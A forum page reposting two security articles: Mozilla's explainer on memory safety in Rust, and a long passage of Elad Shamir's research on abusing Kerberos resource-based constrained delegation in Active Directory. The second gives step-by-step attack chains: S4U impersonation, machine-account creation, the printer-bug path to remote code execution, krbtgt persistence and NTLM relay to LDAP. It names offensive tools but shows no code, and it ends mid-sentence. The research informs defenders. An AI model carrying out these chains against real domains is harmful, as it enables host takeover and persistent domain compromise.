Jump to content

Nytro

Administrators
  • Posts

    18753
  • Joined

  • Last visited

  • Days Won

    726

Everything posted by Nytro

  1. Fearless Security: Memory Safety By Diane Hosfelt Posted on January 23, 2019 in Featured Article, Rust, and Security Share This Fearless Security Last year, Mozilla shipped Quantum CSS in Firefox, which was the culmination of 8 years of investment in Rust, a memory-safe systems programming language, and over a year of rewriting a major browser component in Rust. Until now, all major browser engines have been written in C++, mostly for performance reasons. However, with great performance comes great (memory) responsibility: C++ programmers have to manually manage memory, which opens a Pandora’s box of vulnerabilities. Rust not only prevents these kinds of errors, but the techniques it uses to do so also prevent data races, allowing programmers to reason more effectively about parallel code. In the coming weeks, this three-part series will examine memory safety and thread safety, and close with a case study of the potential security benefits gained from rewriting Firefox’s CSS engine in Rust. What Is Memory Safety When we talk about building secure applications, we often focus on memory safety. Informally, this means that in all possible executions of a program, there is no access to invalid memory. Violations include: use after free null pointer dereference using uninitialized memory double free buffer overflow For a more formal definition, see Michael Hicks’ What is memory safety post and The Meaning of Memory Safety, a paper that formalizes memory safety. Memory violations like these can cause programs to crash unexpectedly and can be exploited to alter intended behavior. Potential consequences of a memory-related bug include information leakage, arbitrary code execution, and remote code execution. Managing Memory Memory management is crucial to both the performance and the security of applications. This section will discuss the basic memory model. One key concept is pointers. A pointer is a variable that stores a memory address. If we visit that memory address, there will be some data there, so we say that the pointer is a reference to (or points to) that data. Just like a home address shows people where to find you, a memory address shows a program where to find data. Everything in a program is located at a particular memory address, including code instructions. Pointer misuse can cause serious security vulnerabilities, including information leakage and arbitrary code execution. Allocation/free When we create a variable, the program needs to allocate enough space in memory to store the data for that variable. Since the memory owned by each process is finite, we also need some way of reclaiming resources (or freeing them). When memory is freed, it becomes available to store new data, but the old data can still exist until it is overwritten. Buffers A buffer is a contiguous area of memory that stores multiple instances of the same data type. For example, the phrase “My cat is Batman” would be stored in a 16-byte buffer. Buffers are defined by a starting memory address and a length; because the data stored in memory next to a buffer could be unrelated, it’s important to ensure we don’t read or write past the buffer boundaries. Control Flow Programs are composed of subroutines, which are executed in a particular order. At the end of a subroutine, the computer jumps to a stored pointer (called the return address) to the next part of code that should be executed. When we jump to the return address, one of three things happens: The process continues as expected (the return address was not corrupted). The process crashes (the return address was altered to point at non-executable memory). The process continues, but not as expected (the return address was altered and control flow changed). How languages achieve memory safety We often think of programming languages on a spectrum. On one end, languages like C/C++ are efficient, but require manual memory management; on the other, interpreted languages use automatic memory management (like reference counting or garbage collection [GC]), but pay the price in performance. Even languages with highly optimized garbage collectors can’t match the performance of non-GC’d languages. Manually Some languages (like C) require programmers to manually manage memory by specifying when to allocate resources, how much to allocate, and when to free the resources. This gives the programmer very fine-grained control over how their implementation uses resources, enabling fast and efficient code. However, this approach is prone to mistakes, particularly in complex codebases. Mistakes that are easy to make include: forgetting that resources have been freed and trying to use them not allocating enough space to store data reading past the boundary of a buffer A safety video candidate for manual memory management Smart pointers A smart pointer is a pointer with additional information to help prevent memory mismanagement. These can be used for automated memory management and bounds checking. Unlike raw pointers, a smart pointer is able to self-destruct, instead of waiting for the programmer to manually destroy it. There’s no single smart pointer type—a smart pointer is any type that wraps a raw pointer in some practical abstraction. Some smart pointers use reference counting to count how many variables are using the data owned by a variable, while others implement a scoping policy to constrain a pointer lifetime to a particular scope. In reference counting, the object’s resources are reclaimed when the last reference to the object is destroyed. Basic reference counting implementations can suffer from performance and space overhead, and can be difficult to use in multi-threaded environments. Situations where objects refer to each other (cyclical references) can prohibit either object’s reference count from ever reaching zero, which requires more sophisticated methods. Garbage Collection Some languages (like Java, Go, Python) are garbage collected. A part of the runtime environment, named the garbage collector (GC), traces variables to determine what resources are reachable in a graph that represents references between objects. Once an object is no longer reachable, its resources are not needed and the GC reclaims the underlying memory to reuse in the future. All allocations and deallocations occur without explicit programmer instruction. While a GC ensures that memory is always used validly, it doesn’t reclaim memory in the most efficient way. The last time an object is used could occur much earlier than when it is freed by the GC. Garbage collection has a performance overhead that can be prohibitive for performance critical applications; it requires up to 5x as much memory to avoid a runtime performance penalty. Ownership To achieve both performance and memory safety, Rust uses a concept called ownership. More formally, the ownership model is an example of an affine type system. All Rust code follows certain ownership rules that allow the compiler to manage memory without incurring runtime costs: Each value has a variable, called the owner. There can only be one owner at a time. When the owner goes out of scope, the value will be dropped. Values can be moved or borrowed between variables. These rules are enforced by a part of the compiler called the borrow checker. When a variable goes out of scope, Rust frees that memory. In the following example, when s1 and s2 go out of scope, they would both try to free the same memory, resulting in a double free error. To prevent this, when a value is moved out of a variable, the previous owner becomes invalid. If the programmer then attempts to use the invalid variable, the compiler will reject the code. This can be avoided by creating a deep copy of the data or by using references. Example 1: Moving ownership let s1 = String::from("hello"); let s2 = s1; //won't compile because s1 is now invalid println!("{}, world!", s1); Another set of rules verified by the borrow checker pertains to variable lifetimes. Rust prohibits the use of uninitialized variables and dangling pointers, which can cause a program to reference unintended data. If the code in the example below compiled, r would reference memory that is deallocated when x goes out of scope—a dangling pointer. The compiler tracks scopes to ensure that all borrows are valid, occasionally requiring the programmer to explicitly annotate variable lifetimes. Example 2: A dangling pointer let r; { let x = 5; r = &x; } println!("r: {}", r); The ownership model provides a strong foundation for ensuring that memory is accessed appropriately, preventing undefined behavior. Memory Vulnerabilities The main consequences of memory vulnerabilities include: Crash: accessing invalid memory can make applications terminate unexpectedly Information leakage: inadvertently exposing non-public data, including sensitive information like passwords Arbitrary code execution (ACE): allows an attacker to execute arbitrary commands on a target machine; when this is possible over a network, we call it a remote code execution (RCE) Another type of problem that can appear is memory leakage, which occurs when memory is allocated, but not released after the program is finished using it. It’s possible to use up all available memory this way. Without any remaining memory, legitimate resource requests will be blocked, causing a denial of service. This is a memory-related problem, but one that can’t be addressed by programming languages. The best case scenario with most memory errors is that an application will crash harmlessly—this isn’t a good best case. However, the worst case scenario is that an attacker can gain control of the program through the vulnerability (which could lead to further attacks). Misusing Free (use-after-free, double free) This subclass of vulnerabilities occurs when some resource has been freed, but its memory position is still referenced. It’s a powerful exploitation method that can lead to out of bounds access, information leakage, code execution and more. Garbage-collected and reference-counted languages prevent the use of invalid pointers by only destroying unreachable objects (which can have a performance penalty), while manually managed languages are particularly susceptible to invalid pointer use (particularly in complex codebases). Rust’s borrow checker doesn’t allow object destruction as long as references to the object exist, which means bugs like these are prevented at compile time. Uninitialized variables If a variable is used prior to initialization, the data it contains could be anything—including random garbage or previously discarded data, resulting in information leakage (these are sometimes called wild pointers). Often, memory managed languages use a default initialization routine that is run after allocation to prevent these problems. Like C, most variables in Rust are uninitialized until assignment—unlike C, you can’t read them prior to initialization. The following code will fail to compile: Example 3: Using an uninitialized variable fn main() { let x: i32; println!("{}", x); } Null pointers When an application dereferences a pointer that turns out to be null, usually this means that it simply accesses garbage that will cause a crash. In some cases, these vulnerabilities can lead to arbitrary code execution 1 2 3. Rust has two types of pointers, references and raw pointers. References are safe to access, while raw pointers could be problematic. Rust prevents null pointer dereferencing two ways: Avoiding nullable pointers Avoiding raw pointer dereferencing Rust avoids nullable pointers by replacing them with a special Option type. In order to manipulate the possibly-null value inside of an Option, the language requires the programmer to explicitly handle the null case or the program will not compile. When we can’t avoid nullable pointers (for example, when interacting with non-Rust code), what can we do? Try to isolate the damage. Any dereferencing raw pointers must occur in an unsafe block. This keyword relaxes Rust’s guarantees to allow some operations that could cause undefined behavior (like dereferencing a raw pointer). Buffer overflow While the other vulnerabilities discussed here are prevented by methods that restrict access to undefined memory, a buffer overflow may access legally allocated memory. The problem is that a buffer overflow inappropriately accesses legally allocated memory. Like a use-after-free bug, out-of-bounds access can also be problematic because it accesses freed memory that hasn’t been reallocated yet, and hence still contains sensitive information that’s supposed to not exist anymore. A buffer overflow simply means an out-of-bounds access. Due to how buffers are stored in memory, they often lead to information leakage, which could include sensitive data such as passwords. More severe instances can allow ACE/RCE vulnerabilities by overwriting the instruction pointer. Example 4: Buffer overflow (C code) int main() { int buf[] = {0, 1, 2, 3, 4}; // print out of bounds printf("Out of bounds: %d\n", buf[10]); // write out of bounds buf[10] = 10; printf("Out of bounds: %d\n", buf[10]); return 0; } The simplest defense against a buffer overflow is to always require a bounds check when accessing elements, but this adds a runtime performance penalty. How does Rust handle this? The built-in buffer types in Rust’s standard library require a bounds check for any random access, but also provide iterator APIs that can reduce the impact of these bounds checks over multiple sequential accesses. These choices ensure that out-of-bounds reads and writes are impossible for these types. Rust promotes patterns that lead to bounds checks only occurring in those places where a programmer would almost certainly have to manually place them in C/C++. Memory safety is only half the battle Memory safety violations open programs to security vulnerabilities like unintentional data leakage and remote code execution. There are various ways to ensure memory safety, including smart pointers and garbage collection. You can even formally prove memory safety. While some languages have accepted slower performance as a tradeoff for memory safety, Rust’s ownership system achieves both memory safety and minimizes the performance costs. Unfortunately, memory errors are only part of the story when we talk about writing secure code. The next post in this series will discuss concurrency attacks and thread safety. Exploiting Memory: In-depth resources Heap memory and exploitation Smashing the stack for fun and profit Analogies of Information Security Intro to use after free vulnerabilities About Diane Hosfelt @avadacatavra Sursa: https://hacks.mozilla.org/2019/01/fearless-security-memory-safety/
  2. Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory 28 January 2019 • Elad Shamir • 41 min read Back in March 2018, I embarked on an arguably pointless crusade to prove that the TrustedToAuthForDelegation attribute was meaningless, and that “protocol transition” can be achieved without it. I believed that security wise, once constrained delegation was enabled (msDS-AllowedToDelegateTo was not null), it did not matter whether it was configured to use “Kerberos only” or “any authentication protocol”. I started the journey with Benjamin Delpy’s (@gentilkiwi) help modifying Kekeo to support a certain attack that involved invoking S4U2Proxy with a silver ticket without a PAC, and we had partial success, but the final TGS turned out to be unusable. Ever since then, I kept coming back to it, trying to solve the problem with different approaches but did not have much success. Until I finally accepted defeat, and ironically then the solution came up, along with several other interesting abuse cases and new attack techniques. TL;DR This post is lengthy, and I am conscious that many of you do not have the time or attention span to read it, so I will try to convey the important points first: Resource-based constrained delegation does not require a forwardable TGS when invoking S4U2Proxy. S4U2Self works on any account that has an SPN, regardless of the state of the TrustedToAuthForDelegation attribute. If TrustedToAuthForDelegation is set, then the TGS that S4U2Self produces is forwardable, unless the principal is sensitive for delegation or a member of the Protected Users group. The above points mean that if an attacker can control a computer object in Active Directory, then it may be possible to abuse it to compromise the host. S4U2Proxy always produces a forwardable TGS, even if the provided additional TGS in the request was not forwardable. The above point means that if an attacker compromises any account with an SPN as well as an account with classic constrained delegation, then it does not matter whether the TrustedToAuthForDelegation attribute is set. By default, any domain user can abuse the MachineAccountQuota to create a computer account and set an SPN for it, which makes it even more trivial to abuse resource-based constrained delegation to mimic protocol transition (obtain a forwardable TGS for arbitrary users to a compromised service). S4U2Self allows generating a valid TGS for arbitrary users, including those marked as sensitive for delegation or members of the Protected Users group. The resulting TGS has a PAC with a valid KDC signature. All that’s required is the computer account credentials or a TGT. The above point in conjunction with unconstrained delegation and “the printer bug” can lead to remote code execution (RCE). Resource-based constrained delegation on the krbtgt account allows producing TGTs for arbitrary users, and can be abused as a persistence technique. Configuring resource-based constrained delegation through NTLM relay from HTTP to LDAP may facilitate remote code execution (RCE) or local privilege escalation (LPE) on MSSQL servers, and local privilege escalation (LPE) on Windows 10/2016/2019. Computer accounts just got a lot more interesting. Start hunting for more primitives to trigger attack chains! Kerberos Delegation 101 If you are not up to speed with abusing Kerberos delegation, you should first read the post S4U2Pwnage by Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_). In that post, they explained it better than I ever could, but I will try to capture it very concisely as well. First, a simplified overview of Kerberos: When users log in, they encrypt a piece of information (a timestamp) with an encryption key derived from their password, to prove to the authentication server that they know the password. This step is called “preauthentication”. In Active Directory environments, the authentication server is a domain controller. Upon successful preauthentication, the authentication server provides the user with a ticket-granting-ticket (TGT), which is valid for a limited time. When a user wishes to authenticate to a certain service, the user presents the TGT to the authentication server. If the TGT is valid, the user receives a ticket-granting service (TGS), also known as a “service ticket”, from the authentication server. The user can then present the TGS to the service they want to access, and the service can authenticate the user and make authorisation decisions based on the data contained in the TGS. A few important notes about Kerberos tickets: Every ticket has a clear-text part and an encrypted part. The clear-text part of the ticket contains the Service Principal Name (SPN) of the service for which the ticket is intended. The encryption key used for the encrypted part of the ticket is derived from the password of the account of the target service. TGTs are encrypted for the built-in account “krbtgt”. The SPN on TGTs is krbtgt/domain name. Often, there is a requirement for a service to impersonate the user to access another service. To facilitate that, the following delegation features were introduced to the Kerberos protocol: Unconstrained Delegation (TrustedForDelegation): The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. Constrained Delegation (S4U2Proxy): The user sends a TGS to access the service (“Service A”), and if the service is allowed to delegate to another pre-defined service (“Service B”), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. Note that the TGS provided in the S4U2Proxy request must have the FORWARDABLE flag set. The FORWARDABLE flag is never set for accounts that are configured as “sensitive for delegation” (the USER_NOT_DELEGATED attribute is set to true) or for members of the Protected Users group. Protocol Transition (S4U2Self/TrustedToAuthForDelegation): S4U2Proxy requires the service to present a TGS for the user to itself before the authentication service produces a TGS for the user to another service. It is often referred to as the “additional ticket”, but I like referring to it as “evidence” that the user has indeed authenticated to the service invoking S4U2Proxy. However, sometimes users authenticate to services via other protocols, such as NTLM or even form-based authentication, and so they do not send a TGS to the service. In such cases, a service can invoke S4U2Self to ask the authentication service to produce a TGS for arbitrary users to itself, which can then be used as “evidence” when invoking S4U2Proxy. This feature allows impersonating users out of thin air, and it is only possible when the TrustedToAuthForDelegation flag is set for the service account that invokes S4U2Self. The Other Constrained Delegation Back in October 2018, I collaborated with Will Schroeder (@harmj0y) to abuse resource-based constrained delegation as an ACL-based computer object takeover primitive. Will wrote an excellent post on this topic, which you should also read before continuing. Once again, in that post, Will explained it better than I ever could, but I will try to capture it very concisely here. In order to configure constrained delegation, one has to have the SeEnableDelegation Privilege, which is sensitive and typically only granted to Domain Admins. In order to give users/resources more independence, Resource-based Constrained Delegation was introduced in Windows Server 2012. Resource-based constrained delegation allows resources to configure which accounts are trusted to delegate to them. This flavour of constrained delegation is very similar to the classic constrained delegation but works in the opposite direction. Classic constrained delegation from account A to account B is configured on account A in the msDS-AllowedToDelegateTo attribute, and defines an “outgoing” trust from A to B, while resource-based constrained delegation is configured on account B in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, and defines an “incoming” trust from A to B. An important observation is that every resource can configure resource-based constrained delegation for itself. In my mind, it does make sense to allow resources to decide for themselves who do they trust. Will and I came up with the following abuse case to compromise a specific host: An attacker compromises an account that has the TrustedToAuthForDelegation flag set (“Service A”). The attacker additionally compromises an account with the rights to configure resource-based constrained delegation for the computer account of the target host (“Service B”). The attacker configures resource-based constrained delegation from Service A to Service B. The attacker invokes S4U2Self and S4U2Proxy as Service A to obtain a TGS for a privileged user to Service B to compromise the target host. The following diagram illustrates this abuse case: It is a nice trick, but compromising an account with the TrustedToAuthForDelegation flag set is not trivial. If only my crusade to defeat TrustedToAuthForDelegation had been more fruitful, it would come in handy for this abuse case. A Selfless Abuse Case: Skipping S4U2Self In an attempt to make the above ACL-based computer object takeover primitive more generic, I slightly modified Rubeus to allow skipping S4U2Self by letting the attacker supply the “evidence” TGS for the victim when invoking S4U2Proxy. Benjamin Delpy also made this modification to Kekeo back in April 2018; however, at the time of writing, Kekeo does not support resource-based constrained delegation. The more generic abuse case would work as follows: The attacker compromises Service A and the DACL to configure resource-based constrained delegation on Service B. By way of social engineering or a watering hole attack, the victim authenticates to Service A to access a service (e.g. CIFS or HTTP). The attacker dumps the TGS of the victim to Service A, using Mimikatz sekurlsa::tickets or through another method. The attacker configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform S4U2Proxy with the TGS previously obtained as the required “evidence”, from Service A to Service B for the victim. The attacker can pass-the-ticket and impersonate the victim to access Service B. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/7odfALcmldo Note that the resulting TGS in the S4U2Proxy response (to service seems to have the FORWARDABLE flag set, unless the principal is marked as sensitive for delegation or is a member of the Protected Users group. Serendipity As I was testing my Rubeus modification in preparation for submitting a pull request, I reset the TrustedToAuthForDelegation UserAccountControl flag on Service A and expected to see an error message when performing S4U2Self. However, S4U2Self worked, as well as S4U2Proxy, and the resulting TGS provided me with access to Service B. The ticket I obtained from S4U2Self was not forwardable, and still, S4U2Proxy accepted it and responded with a TGS for the user to Service B. At this point, I was wondering whether I completely misconfigured my lab environment. Video demonstration of this scenario: https://youtu.be/IZ6BJpr28r4 A Misunderstood Feature #1 After a couple more hours of testing, debugging, and reading MS-SFU, I realised that I had misunderstood S4U2Self. It seems S4U2Self works whether the TrustedToAuthForDelegation UserAccountControl flag is set or not. However, if it is not set, the resulting TGS is not FORWARDABLE, as per section 3.2.5.1.2 of MS-SFU: “If the TrustedToAuthenticationForDelegation parameter on the Service 1 principal is set to: TRUE: the KDC MUST set the FORWARDABLE ticket flag ([RFC4120] section 2.6) in the S4U2self service ticket. FALSE and ServicesAllowedToSendForwardedTicketsTo is nonempty: the KDC MUST NOT set the FORWARDABLE ticket flag ([RFC4120] section 2.6) in the S4U2self service ticket.” A Misunderstood Feature #2 So, S4U2Proxy still shouldn’t have worked with a non-forwardable ticket, right? When I attempted invoking S4U2Proxy with a non-forwardable TGS with classic (“outgoing”) constrained delegation, it failed. But with resource-based constrained delegation (“incoming”) it consistently worked. I thought it must be a bug, and so on 26/10/2018, I reported it to Microsoft Response Center (MSRC). As I was impatiently waiting for a response, I read MS-SFU again and found section 3.2.5.2: “If the service ticket in the additional-tickets field is not set to forwardable<20> and the PA-PAC-OPTIONS [167] ([MS-KILE] section 2.2.10) padata type has the resource-based constrained delegation bit: Not set, then the KDC MUST return KRB-ERR-BADOPTION with STATUS_NO_MATCH. Set and the USER_NOT_DELEGATED bit is set in the UserAccountControl field in the KERB_VALIDATION_INFO structure ([MS-PAC] section 2.5), then the KDC MUST return KRB-ERR-BADOPTION with STATUS_NOT_FOUND.” It seems like a design flaw, also known in Microsoft parlance as a “feature”. S4U2Proxy for resource-based constrained delegation works when provided with a non-forwardable TGS by design! Note that as per the above documentation, even though the TGS doesn’t have to be forwardable for resource-based constrained delegation, if the user is set as “sensitive for delegation”, S4U2Proxy will fail, which is expected. Generic DACL Abuse These two misunderstood “features” mean that the only requirement for the ACL-based computer object takeover primitive is the DACL to configure resource-based constrained delegation on the computer object and another account. Any account with an SPN will do. Even just a TGT for the other account will be enough. The reason an SPN is required is that S4U2Self does not seem to work for accounts that do not have it. But any domain user can obtain an account with an SPN by abusing the MachineAccountQuota, which is set to 10 by default, and allows creating new computer accounts. When creating the new computer account, the user can set an SPN for it, or add one later on. Kevin Robertson (@NetSPI) implemented a tool called Powermad that allows doing that through LDAP. The generic abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”) and the DACL to configure resource-based constrained delegation on a computer account (“Service B”). The attacker configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack (S4U2Self and S4U2Proxy) from Service A to Service B for a user with privileged access to Service B. The attacker can pass-the-ticket and impersonate the user to gain access to Service B. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/ayavtG7J_TQ Note that the TGS obtained from S4U2Self in step 3 is not forwardable, and yet it is accepted as “evidence” when invoking S4U2Proxy. A Forwardable Result When I inspected the resulting TGS in the S4U2Proxy response, it had the FORWARDABLE flag set. I provided S4U2Proxy with a non-forwardable TGS as “evidence” and got a forwardable TGS. Is this a bug or a feature? I went back to MS-SFU section 3.2.5.2.2, and found the following: “The KDC MUST reply with the service ticket where: The sname field contains the name of Service 2. The realm field contains the realm of Service 2. The cname field contains the cname from the service ticket in the additional-tickets field. The crealm field contains the crealm from the service ticket in the additional-tickets field. The FORWARDABLE ticket flag is set. The S4U_DELEGATION_INFO structure is in the new PAC.” It seems like it is another great feature: every TGS produced by S4U2Proxy is always forwardable. Empowering Active Directory Objects and Reflective Resource-Based Constrained Delegation When Microsoft introduced resource-based constrained delegation, it transformed users and computers into strong, independent AD objects, which are able to configure this new “incoming” delegation for themselves. By default, all resources have an Access Control Entry (ACE) that permits them to configure resource-based constrained delegation for themselves. However, if an attacker has credentials for the account, they can forge a silver ticket and gain access to it anyway. The problem with silver tickets is that, when forged, they do not have a PAC with a valid KDC signature. If the target host is configured to validate KDC PAC Signature, the silver ticket will not work. There may also be other security solutions that can detect silver ticket usage. However, if we have credentials for a computer account or even just a TGT, we can configure resource-based constrained delegation from that account to itself, and then use S4U2Self and S4U2Proxy to obtain a TGS for an arbitrary user. The abuse case would work as follows: The attacker compromises credentials or a TGT for a computer account (“Service A”). The attacker configures resource-based constrained delegation from Service A to itself. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS for a user with privileged access to Service A. The attacker can pass-the-ticket and impersonate the user to access Service A. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/63RoJrDMUFg This reflective resource-based constrained delegation is, in fact, equivalent to S4U2Self when the account has the TrustedToAuthForDelegation flag set (also known as “protocol transition”), as it allows the account to obtain a forwardable TGS for itself on behalf of users. However, if an account is configured for classic constrained delegation with “Kerberos only” (TrustedToAuthForDelegation is not set and msDS-AllowedToDelegateTo is not null), then the classic conditions take precedence over the resource-based conditions, and so S4U2Self responds with a non-forwardable TGS and S4U2Proxy fails. Note that this technique will only allow obtaining a TGS for a user as long as it is not set as “sensitive for delegation” and is not a member of the Protected Users group, as you can see in the screenshots below: Solving a Sensitive Problem Inspecting the above output closely indicates that S4U2Self works for a user marked as sensitive for delegation and a member of the Protected Users group. Closer inspection of the ticket shows that it does not have a valid service name, and it is not forwardable: But this can easily be changed because the service name is not in the encrypted part of the ticket. An attacker can use an ASN.1 editor to modify the SPN on the TGS obtained from S4U2Self, and turn it into a valid one. Once that is done, the attacker has a valid TGS. It is not forwardable, but it is fine for authenticating to the service: Video demonstration of this scenario: https://youtu.be/caXFG_vAr-w So, if an attacker has credentials or a TGT for a computer account, they can obtain a TGS to that computer for any user, including sensitive/protected users, with a valid KDC signature in the PAC. That means that obtaining a TGT for a computer account is sufficient to compromise the host. When the Stars Align: Unconstrained Delegation Leads to RCE As Lee Christensen (@tifkin_) demonstrated in “the printer bug” abuse case study at DerbyCon 8, it is possible to trick the Printer Spooler to connect back over SMB to a specified IP/hostname, by invoking the method RpcRemoteFindFirstPrinterChangeNotification (Opnum 62). If an attacker compromises a host with unconstrained delegation, “the printer bug” abuse can result in remote code execution on any domain-joined Windows host with the Printer Spooler running. The abuse case would work as follows: The attacker compromises a host with unconstrained delegation and elevates. The attacker runs the monitor/harvest module of Rubeus. The attacker launches SpoolSample or dementor.py to manipulate the Printer Spooler of the target host to delegate its TGT to the unconstrained delegation compromised host. The attacker can use the captured TGT to obtain a TGS to the target host for any user, even sensitive for delegation/protected users. The attacker obtains a TGS to the target host for a user with local administrator rights and compromises it. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/XqxWHy9e_J8 As Will Schroeder (@harmj0y) explained in his blog post Not A Security Boundary: Breaking Forest Trusts, unconstrained delegation works across forest boundaries, making this attack effective across bidirectional forest trusts. When Accounts Collude - TrustedToAuthForDelegation Who? For years, Active Directory security experts have been telling us that if we must configure Kerberos delegation, constrained delegation is the way to go, and that we should use “Kerberos only” rather than “any authentication protocol” (as known as “protocol transition”). But perhaps the choice between “Kerberos only” and “Any authentication protocol” does not actually matter. We now know that we can abuse resource-based constrained delegation to get a forwardable TGS for arbitrary users. It follows that if we have credentials (or a TGT) for an account with an SPN and for an account with classic constrained delegation but without “protocol transition”, we can combine these two “features” to mimic “protocol transition”. This abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”). The attacker compromises an account (“Service B”), which is set for classic constrained delegation to a certain service class at Service C with Kerberos only (TrustedToAuthForDelegation is not set on Service B, and msDS-AllowedToDelegateTo on Service B contains a service on Service C, such as “time/Service C”). The attacker sets resource-based constrained delegation from Service A to Service B (setting msDS-AllowedToActOnBehalfOfOtherIdentity on Service B to contain “Service A” using Service B credentials or a TGT for Service B). The attacker uses Service A credentials/TGT to perform a full S4U2 attack and obtains a forwardable TGS for the victim to Service B. The attacker uses Service B credentials/TGT to invoke S4U2Proxy with the forwardable TGS from the previous step, and obtains a TGS for the victim to time/Service C. The attacker can modify the service class of the resulting TGS, for example from “time” to “cifs”, because the service name is not protected. The attacker can pass-the-ticket to gain access to Service C. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/y37Eo9zHib8 Unconstrained Domain Persistence Once attackers compromise the domain, they can obviously configure resource-based constrained delegation on strategic objects, such as domain controllers, and obtain a TGS on-demand. But resource-based constrained delegation can also be configured to generate TGTs on-demand as a domain persistence technique. Once the domain is compromised, resource-based constrained delegation can be configured from a compromised account to the krbtgt account to produce TGTs. The abuse case would work as follows: The attacker compromises the domain and an account that has an SPN or creates one (“Service A”). The attacker configures resource-based constrained delegation from Service A to krbtgt. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS for an arbitrary user to krbtgt, which is, in fact, a TGT. The attacker can use the TGT to request a TGS to arbitrary services. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/1BU2BflUHxA In this scenario, the account Service A obtained a degree of power somewhat similar to that of the KDC in the sense that it can produce a TGT for arbitrary users. Arguably, more subtle persistence can be achieved through a new access control entry (ACE) to allow configuring resource-based constrained delegation on-demand, rather than leaving it in plain sight. Thinking Outisde the Box: RCE/LPE Opportunities As shown above, if an attacker can compromise a host with unconstrained delegation, RCE can be achieved with “the printer bug” and S4U2Self. But unconstrained delegation is not a trivial condition, so I attempted to come up with an attack chain that does not require unconstrained delegation. As mentioned above, every resource has the rights to configure resource-based constrained delegation for itself, which can be done via LDAP. This primitive opens the door to RCE/LPE opportunities if an attacker is in a position to perform a successful NTLM relay of a computer account authentication to LDAP. The abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”). The attacker triggers a computer account authentication using a primitive such as “the printer bug”. The attacker performs an NTLM relay of the computer account (“Service B”) authentication to LDAP on the domain controller. The attacker configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS to Service B for a user that has local administrator rights on that host. The attacker can pass-the-ticket and gain RCE/LPE, depending on the primitive used to trigger the computer account authentication. The above scenario is straightforward and too good to be true. However, the reality is that NTLM relay is more complicated than it seems. NTLM Relay 101 NetNTLM is a challenge-response authentication protocol designed by Microsoft for Windows environments. In the NetNTLM protocol, three messages are exchanged: The client sends a NEGOTIATE message to request authentication and “advertise capabilities”. The server sends a CHALLENGE message that contains a random 8-byte nonce. The client sends an AUTHENTICATE message that contains a response to the challenge. The response is calculated using a cryptographic function with a key derived from the user’s password (the NTLM hash). The server validates the response to the challenge. If it is valid, authentication is successful. Otherwise, authentication fails. The protocol is susceptible to the following relay attack: An attacker in a man-in-the-middle position waits for an incoming NEGOTIATE message from a victim. The attacker relays the NEGOTIATE message to the target server. The target server sends a CHALLENGE message to the attacker. The attacker relays the CHALLENGE message to the victim. The victim generates a valid AUTHENTICATE message and sends it to the attacker. The attacker relays the valid AUTHENTICATE message to the target server. The target server accepts the AUTHENTICATE message and the attacker is authenticated successfully. The following diagram illustrates an NTLM relay attack: The NetNTLM protocol does not only provide authentication but can also facilitate a session key exchange for encryption (“sealing”) and signing. The client and the server negotiate whether sealing/signing is required through certain flags in the exchanged messages. The exchanged session key is RC4 encrypted using a key derived from the client’s NTLM hash. The client obviously holds the NTLM hash and can decrypt it. However, a domain member server does not hold the NTLM hash of domain users, but only of local users. When a domain user exchanges a session key with a member server, the member server uses the Netlogon RPC protocol to validate the client’s response to the challenge with a domain controller, and if a session key was exchanged then the key to decrypt it is calculated by the domain controller and provided to the member server. This separation of knowledge ensures that the member server does not obtain the NTLM hash of the client, and the domain controller does not obtain the session key. If the client and server negotiate a session key for signing, an attacker performing a relay attack can successfully authenticate, but will not be able to obtain the session key to sign subsequent messages, unless the attacker can obtain one of the following: The NTLM hash of the victim. Credentials for the computer account of the target server. Compromise a domain controller. However, if the attacker obtains any of the above, they do not need to perform an NTLM relay attack to compromise the target host or impersonate the victim, and this is the reason signing mitigates NTLM relay attacks. NTLM Relay 102 The goal is to perform a successful relay, without negotiating signing or encryption, from any protocol to LDAP. Most of the primitives I am aware of for eliciting a connection from a computer account are initiated by the SMB client or the RPC client, both of which always seem to negotiate signing. If signing was negotiated in the NTLM exchange, the LDAP service on domain controllers ignores all unsigned messages (tested on Windows Server 2016 and Windows Server 2012R2). The most obvious next move is to reset the flags that negotiate signing during the NTLM relay. However, Microsoft introduced a MIC (Message Integrity Code, I believe) to the NTLM protocol to prevent that. The MIC is sent by the client in the AUTHENTICATE message, and it protects the integrity of all three NTLM messages using HMAC-MD5 with the session key. If a single bit of the NTLM messages had been altered, the MIC would be invalid and authentication would fail. Not all clients support MIC, such as Windows XP/2003 and prior, and so it is not mandatory. So another thing to try would be omitting the MIC during the NTLM relay. However, there is a flag that indicates whether a MIC is present or not, and that flag is part of the “salt” used when calculating the NetNTLM response to the challenge. Therefore, if the MIC is removed and the corresponding flag is reset, then the NetNTLM response will be invalid and authentication will fail. Reflective NTLM Relay is Dead Traditionally, NTLM relay of computer accounts was performed reflectively, meaning from a certain host back to itself. Until MS08-068, it was commonly performed to achieve RCE by relaying from SMB to SMB. After it was patched, reflective cross-protocol NTLM relay was still possible, and was most commonly abused to achieve LPE in attacks such as Hot Potato. Cross-protocol reflective relay was patched in MS16-075, which killed reflective relays for good (or until James Forshaw brings it back). Rotten Potato/Juicy Potato is still alive and kicking, but it is a different flavour of reflective relay as it abuses local authentication, which ignores the challenge-response. Post MS16-075 many security researchers stopped hunting for primitives that elicit computer account authentication, because without reflection they were no longer valuable. Viable NTLM Relay Primitives for RCE/LPE An RCE/LPE 